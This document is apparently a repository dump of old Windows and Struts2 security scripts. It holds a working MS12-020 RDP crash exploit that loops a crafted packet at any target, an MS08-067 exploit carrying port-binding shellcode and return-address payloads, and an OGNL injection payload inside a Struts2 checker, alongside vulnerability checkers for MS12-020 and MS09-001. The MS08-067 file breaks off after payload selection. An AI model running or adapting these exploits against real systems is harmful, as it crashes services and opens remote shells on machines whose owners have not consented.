├── .gitattributes
├── MS12-020_exploit.py
├── .gitignore
├── MS12-020_remote_check.py
├── MS09-001_remote_check.py
├── struts2_s2_016_017_vuln_check.py
└── ms08_067.py


/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | *.sln    merge=union
 7 | *.csproj merge=union
 8 | *.vbproj merge=union
 9 | *.fsproj merge=union
10 | *.dbproj merge=union
11 | 
12 | # Standard to msysgit
13 | *.doc	 diff=astextplain
14 | *.DOC	 diff=astextplain
15 | *.docx diff=astextplain
16 | *.DOCX diff=astextplain
17 | *.dot  diff=astextplain
18 | *.DOT  diff=astextplain
19 | *.pdf  diff=astextplain
20 | *.PDF	 diff=astextplain
21 | *.rtf	 diff=astextplain
22 | *.RTF	 diff=astextplain
23 | 


--------------------------------------------------------------------------------
/MS12-020_exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #Changed:Qiaoy<traceurq@gmail.com>
 3 | #date:2012.03.1
 4 | 
 5 | import socket
 6 | import sys
 7 | import time
 8 | 
 9 | buf0 = "030000130ee000000000000100080000000000".decode('hex')
10 | buf1 = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex')
11 | buf2 = "0300000802f08028".decode('hex')
12 | package = buf0+buf1+buf2
13 | 
14 | if len(sys.argv) != 3:
15 | 	print 'exp:'
16 | 	print '	python MS12-020_exploit.py [ip] [port]'
17 | 	sys.exit(1)
18 | else:
19 | 	HOST = sys.argv[1]
20 | 	PORT = int(sys.argv[2])
21 | 	for i in xrange(9999):
22 | 		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | 		s.settimeout(3)
24 | 		s.connect((HOST,PORT))
25 | 		try:
26 | 			s.send(package)
27 | 			rec = s.recv(1024)
28 | 			s.close()
29 | 		except:
30 | 			print 'Successed!'
31 | 			sys.exit(1)


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | #################
  2 | ## Eclipse
  3 | #################
  4 | 
  5 | *.pydevproject
  6 | .project
  7 | .metadata
  8 | bin/
  9 | tmp/
 10 | *.tmp
 11 | *.bak
 12 | *.swp
 13 | *~.nib
 14 | local.properties
 15 | .classpath
 16 | .settings/
 17 | .loadpath
 18 | 
 19 | # External tool builders
 20 | .externalToolBuilders/
 21 | 
 22 | # Locally stored "Eclipse launch configurations"
 23 | *.launch
 24 | 
 25 | # CDT-specific
 26 | .cproject
 27 | 
 28 | # PDT-specific
 29 | .buildpath
 30 | 
 31 | 
 32 | #################
 33 | ## Visual Studio
 34 | #################
 35 | 
 36 | ## Ignore Visual Studio temporary files, build results, and
 37 | ## files generated by popular Visual Studio add-ons.
 38 | 
 39 | # User-specific files
 40 | *.suo
 41 | *.user
 42 | *.sln.docstates
 43 | 
 44 | # Build results
 45 | 
 46 | [Dd]ebug/
 47 | [Rr]elease/
 48 | x64/
 49 | build/
 50 | [Bb]in/
 51 | [Oo]bj/
 52 | 
 53 | # MSTest test Results
 54 | [Tt]est[Rr]esult*/
 55 | [Bb]uild[Ll]og.*
 56 | 
 57 | *_i.c
 58 | *_p.c
 59 | *.ilk
 60 | *.meta
 61 | *.obj
 62 | *.pch
 63 | *.pdb
 64 | *.pgc
 65 | *.pgd
 66 | *.rsp
 67 | *.sbr
 68 | *.tlb
 69 | *.tli
 70 | *.tlh
 71 | *.tmp
 72 | *.tmp_proj
 73 | *.log
 74 | *.vspscc
 75 | *.vssscc
 76 | .builds
 77 | *.pidb
 78 | *.log
 79 | *.scc
 80 | 
 81 | # Visual C++ cache files
 82 | ipch/
 83 | *.aps
 84 | *.ncb
 85 | *.opensdf
 86 | *.sdf
 87 | *.cachefile
 88 | 
 89 | # Visual Studio profiler
 90 | *.psess
 91 | *.vsp
 92 | *.vspx
 93 | 
 94 | # Guidance Automation Toolkit
 95 | *.gpState
 96 | 
 97 | # ReSharper is a .NET coding add-in
 98 | _ReSharper*/
 99 | *.[Rr]e[Ss]harper
100 | 
101 | # TeamCity is a build add-in
102 | _TeamCity*
103 | 
104 | # DotCover is a Code Coverage Tool
105 | *.dotCover
106 | 
107 | # NCrunch
108 | *.ncrunch*
109 | .*crunch*.local.xml
110 | 
111 | # Installshield output folder
112 | [Ee]xpress/
113 | 
114 | # DocProject is a documentation generator add-in
115 | DocProject/buildhelp/
116 | DocProject/Help/*.HxT
117 | DocProject/Help/*.HxC
118 | DocProject/Help/*.hhc
119 | DocProject/Help/*.hhk
120 | DocProject/Help/*.hhp
121 | DocProject/Help/Html2
122 | DocProject/Help/html
123 | 
124 | # Click-Once directory
125 | publish/
126 | 
127 | # Publish Web Output
128 | *.Publish.xml
129 | *.pubxml
130 | 
131 | # NuGet Packages Directory
132 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line
133 | #packages/
134 | 
135 | # Windows Azure Build Output
136 | csx
137 | *.build.csdef
138 | 
139 | # Windows Store app package directory
140 | AppPackages/
141 | 
142 | # Others
143 | sql/
144 | *.Cache
145 | ClientBin/
146 | [Ss]tyle[Cc]op.*
147 | ~$*
148 | *~
149 | *.dbmdl
150 | *.[Pp]ublish.xml
151 | *.pfx
152 | *.publishsettings
153 | 
154 | # RIA/Silverlight projects
155 | Generated_Code/
156 | 
157 | # Backup & report files from converting an old project file to a newer
158 | # Visual Studio version. Backup files are not needed, because we have git ;-)
159 | _UpgradeReport_Files/
160 | Backup*/
161 | UpgradeLog*.XML
162 | UpgradeLog*.htm
163 | 
164 | # SQL Server files
165 | App_Data/*.mdf
166 | App_Data/*.ldf
167 | 
168 | #############
169 | ## Windows detritus
170 | #############
171 | 
172 | # Windows image file caches
173 | Thumbs.db
174 | ehthumbs.db
175 | 
176 | # Folder config file
177 | Desktop.ini
178 | 
179 | # Recycle Bin used on file shares
180 | $RECYCLE.BIN/
181 | 
182 | # Mac crap
183 | .DS_Store
184 | 
185 | 
186 | #############
187 | ## Python
188 | #############
189 | 
190 | *.py[co]
191 | 
192 | # Packages
193 | *.egg
194 | *.egg-info
195 | dist/
196 | build/
197 | eggs/
198 | parts/
199 | var/
200 | sdist/
201 | develop-eggs/
202 | .installed.cfg
203 | 
204 | # Installer logs
205 | pip-log.txt
206 | 
207 | # Unit test / coverage reports
208 | .coverage
209 | .tox
210 | 
211 | #Translations
212 | *.mo
213 | 
214 | #Mr Developer
215 | .mr.developer.cfg
216 | 


--------------------------------------------------------------------------------
/MS12-020_remote_check.py:
--------------------------------------------------------------------------------
  1 | # -*- coding:utf-8 -*-
  2 | #
  3 | # MS12-020 remote safe checker (no BSOD)
  4 | #
  5 | # Use DoS bug (CVE-2012-0152) for check
  6 | #
  7 | # by Worawit Wang (sleepya)
  8 | #
  9 | 
 10 | import sys
 11 | import socket
 12 | from struct import pack,unpack
 13 | 
 14 | host = sys.argv[1]
 15 | 
 16 | def make_tpkt(data):
 17 |     return pack("!BBH", 3, 0, 4+len(data)) + data
 18 | 
 19 | def make_x224(type, data):
 20 |     return pack("!BB", 1+len(data), type) + data
 21 | 
 22 | def make_rdp(type, flags, data):
 23 |     return pack("<BBH", type, flags, 4+len(data)) + data
 24 | 
 25 | 
 26 | sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 27 | sk.settimeout(10)
 28 | try:
 29 |     sk.connect((host,3389))
 30 | except:
 31 |     print "Can't connect remote host on 3389!"
 32 |     sys.exit()
 33 | 
 34 | # connection request
 35 | # x224 type 0xe0 (dst_ref, src_ref, class_opts, data)
 36 | rdp = make_rdp(1, 0, pack("!I", 0))
 37 | x224_1 = make_x224(0xe0, pack("!HHB", 0, 0, 0) + rdp)
 38 | #sk.send(make_tpkt(x224_1))
 39 | sk.send("\x03\x00\x00\x0b\x06\xe0\x00\x00\x00\x00\x00")
 40 | data = sk.recv(8192)
 41 | if data != "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00":
 42 |     print "Cannot check"
 43 |     sys.exit()
 44 | 
 45 | # x224 type 0xf0 (Data TPDU)
 46 | # - EOT (0x80)
 47 | x224_2 = make_x224(0xf0, pack("!B", 0x80))
 48 | 
 49 | # craft connect-initial with gcc
 50 | target_params = (""
 51 |     + "\x02\x01\x22" # maxChannelIds
 52 |     + "\x02\x01\x20" # maxUserIds
 53 |     + "\x02\x01\x00" # maxTokenIds
 54 |     + "\x02\x01\x01" # numPriorities
 55 |     + "\x02\x01\x00" # minThroughput
 56 |     + "\x02\x01\x01" # maxHeight
 57 |     + "\x02\x02\xff\xff" # maxMCSPDUSize
 58 |     + "\x02\x01\x02" # protocolVersion
 59 | )
 60 | min_params = (""
 61 |     + "\x02\x01\x01" # maxChannelIds       
 62 |     + "\x02\x01\x01" # maxUserIds          
 63 |     + "\x02\x01\x01" # maxTokenIds         
 64 |     + "\x02\x01\x01" # numPriorities       
 65 |     + "\x02\x01\x00" # minThroughput       
 66 |     + "\x02\x01\x01" # maxHeight           
 67 |     + "\x02\x01\xff" # maxMCSPDUSize
 68 |     + "\x02\x01\x02" # protocolVersion
 69 | )
 70 | max_params = (""
 71 |     + "\x02\x01\xff" # maxChannelIds           
 72 |     + "\x02\x01\xff" # maxUserIds              
 73 |     + "\x02\x01\xff" # maxTokenIds             
 74 |     + "\x02\x01\x01" # numPriorities           
 75 |     + "\x02\x01\x00" # minThroughput           
 76 |     + "\x02\x01\x01" # maxHeight               
 77 |     + "\x02\x02\xff\xff" # maxMCSPDUSize
 78 |     + "\x02\x01\x02" # protocolVersion
 79 | )
 80 | mcs_data = (""
 81 |     + "\x04\x01\x01" # callingDomainSelector
 82 |     + "\x04\x01\x01" # calledDomainSelector
 83 |     + "\x01\x01\xff" # upwardFlag
 84 |     + "\x30" + pack("B", len(target_params)) + target_params
 85 |     + "\x30" + pack("B", len(min_params)) + min_params
 86 |     + "\x30" + pack("B", len(max_params)) + max_params
 87 |     + "\x04\x00" # userData
 88 | )
 89 | 
 90 | # \x7f\x65  BER: APPLICATION 101 = Connect-Initial (MCS_TYPE_CONNECTINITIAL)
 91 | mcs = "\x7f\x65" + pack("!B", len(mcs_data))
 92 | sk.send(make_tpkt(x224_2 + mcs + mcs_data))
 93 | 
 94 | # attach user request
 95 | sk.send(make_tpkt(x224_2 + "\x28"))
 96 | data = sk.recv(8192)
 97 | user1 = unpack("!H", data[9:11])[0]
 98 | 
 99 | sk.send(make_tpkt(x224_2 + "\x28"))
100 | data = sk.recv(8192)
101 | user2 = unpack("!H", data[9:11])[0]
102 | 
103 | # join its own channel (prevent BSOD)
104 | sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user2, user2+1001)))
105 | data = sk.recv(8192)
106 | 
107 | # channel join request
108 | sk.send(make_tpkt(x224_2 + "\x38" + pack("!HH", user1, user2+1001)))
109 | data = sk.recv(8192)
110 | if data[7:9] == "\x3e\x00":
111 |     print "!!! VULN !!!"
112 | else:
113 |     print "patched"
114 | 
115 | sk.close()
116 | 


--------------------------------------------------------------------------------
/MS09-001_remote_check.py:
--------------------------------------------------------------------------------
  1 | # coding: utf8
  2 | # MS09-001 SMB Could Allow Remote Code Execution (958687) - Remote Check
  3 | # Author: tntC4stl3
  4 | # http://tntcastle.net
  5 | # [+] test xp sp2, win 7 sp0
  6 | # Reference: http://openvas.komma-nix.de/nasl.php?oid=900233
  7 | #            http://hi.baidu.com/netcicala/item/620972bb2454f3a7ebba934a
  8 | 
  9 | import impacket
 10 | from impacket import smb
 11 | from impacket import nmb
 12 | 
 13 | 
 14 | def ms09001(remoteHost):
 15 |     r = smb.SMB(remote_name='*SMBSERVER', remote_host=remoteHost, sess_port = 445)
 16 |     r.login(user='', password='', domain='')
 17 | 
 18 |     # Get Tree ID and Process ID from the response packet
 19 |     uid = r.get_uid()
 20 |     if not uid:
 21 |         return 0
 22 | 
 23 |     path = r'\\%s\IPC$' % remoteHost
 24 |     tid = r.tree_connect_andx(path=path)
 25 | 
 26 |     # Construct Specially Crafted "\browser" Request
 27 |     smbPack = smb.NewSMBPacket()
 28 |     smbPack['Flags1'] = 0x08
 29 |     smbPack['Flags2'] = 0xc801
 30 |     smbPack['Tid'] = tid
 31 |     smbPack['Uid'] = uid
 32 |     smbPack['Pid'] = 0x4da2
 33 |     smbPack['Mid'] = 0x0b
 34 | 
 35 |     ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
 36 |     ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters()
 37 |     ntCreate['Data'] = smb.SMBNtCreateAndX_Data()
 38 |     ntCreate['Parameters']['FileNameLength'] = 16
 39 |     ntCreate['Parameters']['AndXOffset'] = 0x0000
 40 |     ntCreate['Parameters']['CreateFlags'] = 0 #16
 41 |     ntCreate['Parameters']['AccessMask'] = 0x2019f
 42 |     ntCreate['Parameters']['CreateOptions'] = 0 #0x400040
 43 |     ntCreate['Parameters']['ShareAccess'] = 3
 44 |     ntCreate['Parameters']['Impersonation'] = 2
 45 |     ntCreate['Parameters']['Disposition'] = 1
 46 |     ntCreate['Parameters']['SecurityFlags'] = 0
 47 | 
 48 |     # \browser
 49 |     ntCreate['Data'] = "\x00\x5c\x00\x62\x00\x72\x00\x6f\x00\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00"
 50 |     smbPack.addCommand(ntCreate)
 51 |     r.sendSMB(smbPack)
 52 |     resp = r.recvSMB()
 53 | 
 54 |     if len(resp) < 103:
 55 |         return 0
 56 |     else:
 57 |         # Get FID from the response packet
 58 |         ntCreateResponse = smb.SMBCommand(resp['Data'][0])
 59 |         ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])
 60 |         fid = ntCreateParameters['Fid']
 61 | 
 62 |     # Construct Write AndX Request
 63 |     smbPack = smb.NewSMBPacket()
 64 |     smbPack['Flags1'] = 0x18
 65 |     smbPack['Flags2'] = 0xc803
 66 |     smbPack['Tid'] = tid
 67 |     smbPack['Uid'] = uid
 68 |     smbPack['Pid'] = 0x54dc
 69 |     smbPack['Mid'] = 0x0140
 70 |     data = """\x05\x00\x0b\x03\x10\x00\x00\x00
 71 |     \x48\x00\x00\x00\x00\x00\x00\x00
 72 |     \xb8\x10\xb8\x10\x00\x00\x00\x00
 73 |     \x01\x00\x00\x00\x00\x00\x01\x00
 74 |     \xc8\x4f\x32\x4b\x70\x16\xd3\x01
 75 |     \x12\x78\x5a\x47\xbf\x6e\xe1\x88
 76 |     \x03\x00\x00\x00\x04\x5d\x88\x8a
 77 |     \xeb\x1c\xc9\x11\x9f\xe8\x08\x00
 78 |     \x2b\x10\x48\x60\x02\x00\x00\x00"""
 79 | 
 80 |     writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
 81 |     smbPack.addCommand(writeAndX)
 82 | 
 83 |     writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters()
 84 |     writeAndX['Parameters']['Fid'] = fid
 85 |     writeAndX['Parameters']['AndXOffset'] = 0
 86 |     writeAndX['Parameters']['Offset'] = 0
 87 |     writeAndX['Parameters']['WriteMode'] = 8
 88 |     writeAndX['Parameters']['Remaining'] = 72
 89 |     writeAndX['Parameters']['_reserved'] = 0xffffffff
 90 |     writeAndX['Parameters']['DataLength'] = 72
 91 |     writeAndX['Parameters']['DataOffset'] = 200 
 92 |     writeAndX['Parameters']['HighOffset'] = 0
 93 |     
 94 |     writeAndX['Data'] = data
 95 |     r.sendSMB(smbPack)
 96 |     resp = r.recvSMB()
 97 |     r.close(tid, fid)
 98 | 
 99 |     # Check the response and decide OS is vulnerable
100 |     if (resp and ord(resp.rawData[4]) == 47 and ord(resp.rawData[5]) == 0  and
101 |         ord(resp.rawData[6]) == 0 and ord(resp.rawData[7]) == 0 and ord(resp.rawData[8]) == 0):        
102 |         return 1
103 |     else:
104 |         return 0
105 | 
106 | if __name__ == '__main__':
107 |     remoteHost = '192.168.12.38'
108 |     if ms09001(remoteHost):
109 |         print '!!! VULN !!!'
110 |     else:
111 |         print 'patched or not effected'


--------------------------------------------------------------------------------
/struts2_s2_016_017_vuln_check.py:
--------------------------------------------------------------------------------
  1 | # coding: utf-8
  2 | # Author: tntC4stl3
  3 | # Name  : Struts2 S2-016 S2-017检测工具
  4 | 
  5 | import wx
  6 | import requests
  7 | import re
  8 | import urllib2	
  9 | from bs4 import BeautifulSoup
 10 | 
 11 | class Struts2checker(wx.Frame):
 12 | 	"""界面布局"""
 13 | 	def __init__(self):
 14 | 		wx.Frame.__init__(self, None, -1, u"Struts2 S2-016 S2-017漏洞检查工具", size=(600, 260))
 15 | 		panel = wx.Panel(self)
 16 | 
 17 | 		self.icon = wx.Icon('favicon.ico', wx.BITMAP_TYPE_ICO)
 18 | 		self.SetIcon(self.icon)
 19 | 
 20 | 		#typeList = [u'以.action/.jsp/.do结尾的url (如：http://192.168.12.220/struts2-blank/example/HelloWorld.action)', u'带表单的url (如：有登陆框的页面)']
 21 | 		#self.checkBox = wx.RadioBox(panel, -1, u'选项', (-1, 10), wx.DefaultSize, 
 22 | 	#				typeList, 1, wx.RA_SPECIFY_COLS)
 23 | 		urlLbl = wx.StaticText(panel, -1, u"URL地址：")
 24 | 		self.urlText = wx.TextCtrl(panel, -1, u"", style=wx.TE_LEFT)
 25 | 		checkBtn = wx.Button(panel, -1, u"检测")
 26 | 		self.Bind(wx.EVT_BUTTON, self.vulnCheck, checkBtn)
 27 | 		self.resultText = wx.TextCtrl(panel, -1, "", size=(-1, 100),
 28 | 							style=wx.TE_MULTILINE|wx.TE_READONLY)
 29 | 		adviceLbl = wx.StaticText(panel, -1, 
 30 | 			u"提示：建议输入以.action/.jsp/.do结尾的url (如：http://192.168.12.220/HelloWorld.action) 或者页面带表单的url (如：带有用户名密码输入框)",
 31 | 			style=wx.TE_MULTILINE, size=(-1, 30))
 32 | 
 33 | 		# main Sizer
 34 | 		mainSizer = wx.BoxSizer(wx.VERTICAL)
 35 | 
 36 | 		checkSizer = wx.GridBagSizer(hgap=1, vgap=4)
 37 | 		checkSizer.AddGrowableCol(1)
 38 | 		checkSizer.Add(urlLbl, pos=(0, 0))
 39 | 		checkSizer.Add(self.urlText, pos=(0, 1), flag=wx.EXPAND)
 40 | 		checkSizer.Add(checkBtn, pos=(0, 3))
 41 | 		mainSizer.Add(checkSizer, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 10)
 42 | 
 43 | 		mainSizer.Add(adviceLbl, 0, wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT, 10)
 44 | 
 45 | 		resultBox = wx.StaticBox(panel, -1, u"扫描结果")
 46 | 		resultSizer = wx.StaticBoxSizer(resultBox, wx.VERTICAL)
 47 | 		resultSizer.Add(self.resultText, 0, wx.EXPAND, 10)
 48 | 		mainSizer.Add(resultSizer, 0, wx.EXPAND|wx.ALL, 10)
 49 | 
 50 | 		panel.SetSizer(mainSizer)
 51 | 
 52 | 		self.Show(True)
 53 | 
 54 | 	# S2-016
 55 | 	def exp1(self, url):
 56 | 		exp = "?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D"
 57 | 		string = url + exp
 58 | 
 59 | 		path_compile = r'(^[a-zA-Z]:(((\\(?! )[^\\\:*?"<>|]+)+\\?)|(\\))\s*$)|(^/([^/ \t]+/)*$)'
 60 | 		try:
 61 | 			r = requests.get(string, verify=False)
 62 | 			if re.match(path_compile, r.content.strip()):
 63 | 				return 1
 64 | 		except:
 65 | 			return 0
 66 | 
 67 | 	# S2-017
 68 | 	def exp2(self, url):
 69 | 		exp = "?redirect:http://www.venustech.com.cn/"
 70 | 		string = url + exp
 71 | 
 72 | 		try:
 73 | 			r = requests.get(string, verify=False, allow_redirects=False)
 74 | 			if r.headers['location'] == 'http://www.venustech.com.cn/':
 75 | 				return 1
 76 | 		except:
 77 | 			return 0
 78 | 
 79 | 	def getAction(self, url, action):
 80 | 		s = re.search(r'.*\.(action|jsp|do)', action)
 81 | 		action = s.group(0)
 82 | 		if action.startswith('/'):
 83 | 			r = urllib2.Request(url)
 84 | 			string = '%s://%s%s' % (r.get_type(), r.get_host(), action)
 85 | 		else:
 86 | 			if url.endswith('/'):
 87 | 				string = url + action
 88 | 			else:
 89 | 				string = url + '/' + action
 90 | 		return string
 91 | 
 92 | 	def vulnCheck(self, event):
 93 | 		self.resultText.Clear()
 94 | 		url = self.urlText.GetValue().strip()
 95 | 		if url == '':
 96 | 			dlg = wx.MessageDialog(self, u'URL地址为空！', '', wx.OK|wx.ICON_ERROR)
 97 | 			if dlg.ShowModal() == wx.ID_OK:
 98 | 				dlg.Destroy()
 99 | 				return
100 | 		
101 | 		try:
102 | 			r = requests.get(url, verify=False, timeout=6)
103 | 		except:
104 | 			self.resultText.AppendText(u'连接网站失败，请检查网址是否输入正确。\n')
105 | 			return
106 | 
107 | 		if re.search(r'\.(action|do|jsp)$', url):
108 | 			pass
109 | 		else:
110 | 			soup = BeautifulSoup(r.content)
111 | 			try:
112 | 				action = soup.form['action'].strip()
113 | 				if re.search(r'\.(action|do|jsp)', action):
114 | 					url = self.getAction(url, action)
115 | 				else:
116 | 					self.resultText.AppendText(u'您的URL不符合检查要求。\n')
117 | 					return
118 | 			except:
119 | 				self.resultText.AppendText(u'您的URL不符合检查要求。\n')
120 | 				return
121 | 
122 | 		print url
123 | 		rtn = self.exp1(url)
124 | 		if rtn == 1:
125 | 			self.resultText.AppendText(u'您的网站存在Struts漏洞(S2-016)，建议将Struts版本升级至2.3.15.1及以上。\n')
126 | 		else:
127 | 			self.resultText.AppendText(u'您的网站未检测到S2-016漏洞。\n')
128 | 
129 | 		rtn = self.exp2(url)
130 | 		if rtn == 1:
131 | 			self.resultText.AppendText(u'您的网站存在Struts漏洞(S2-017)，建议将Struts版本升级至2.3.15.1及以上。\n')
132 | 		else:
133 | 			self.resultText.AppendText(u'您的网站未检测到S2-017漏洞。\n')
134 | 
135 | 
136 | if __name__ == '__main__':
137 | 	app = wx.App(False)
138 | 	frame = Struts2checker()
139 | 	app.MainLoop()
140 | 
141 | 


--------------------------------------------------------------------------------
/ms08_067.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #############################################################################
  3 | #   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
  4 | #   www.hackingspirits.com
  5 | #   www.coffeeandsecurity.com
  6 | #   Email: d3basis.m0hanty @ gmail.com
  7 | #############################################################################
  8 |  
  9 | import struct
 10 | import sys
 11 |  
 12 | from threading import Thread    #Thread is imported incase you would like to modify
 13 |                                 #the src to run against multiple targets.
 14 |  
 15 | try:
 16 |     from impacket import smb
 17 |     from impacket import uuid
 18 |     from impacket.dcerpc import dcerpc
 19 |     from impacket.dcerpc import transport
 20 | except ImportError, _:
 21 |     print 'Install the following library to make this script work'
 22 |     print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
 23 |     print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
 24 |     sys.exit(1)
 25 |  
 26 |  
 27 | print '#######################################################################'
 28 | print '#   MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
 29 | print '#   www.hackingspirits.com'
 30 | print '#   www.coffeeandsecurity.com'
 31 | print '#   Email: d3basis.m0hanty @ gmail.com'
 32 | print '#######################################################################\n'
 33 |  
 34 |  
 35 | #Portbind shellcode from metasploit; Binds port to TCP port 4444
 36 | shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 37 | shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
 38 | shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
 39 | shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
 40 | shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
 41 | shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
 42 | shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
 43 | shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
 44 | shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
 45 | shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
 46 | shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
 47 | shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
 48 | shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
 49 | shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
 50 | shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
 51 | shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
 52 | shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
 53 | shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
 54 | shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
 55 | shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
 56 | shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
 57 | shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
 58 | shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
 59 |  
 60 |  
 61 | #Payload for Windows 2000 target
 62 | payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
 63 | payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
 64 | payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
 65 | payload_1+='\x41\x41'
 66 | payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
 67 | payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
 68 | payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
 69 | payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
 70 | payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
 71 | payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
 72 | payload_1+='\xeb\xcc'
 73 | payload_1+='\x00\x00'
 74 |  
 75 | #Payload for Windows 2003[SP2] target
 76 | payload_2='\x41\x00\x5c\x00'
 77 | payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
 78 | payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
 79 | payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
 80 | payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
 81 | payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
 82 | payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
 83 | payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
 84 | payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
 85 | payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
 86 | payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
 87 | payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
 88 |  
 89 |  
 90 | if sys.argv[2]=='1':    #Windows 2000 Payload
 91 |     payload=payload_1
 92 |     print '[-]Windows 2000 payload loaded'
 93 | if sys.argv[2]=='2':    #Windows 2003[SP2] Payload
 94 |     payload=payload_2
 95 |     print '[-]Windows 2003[SP2] payload loaded'
 96 |  
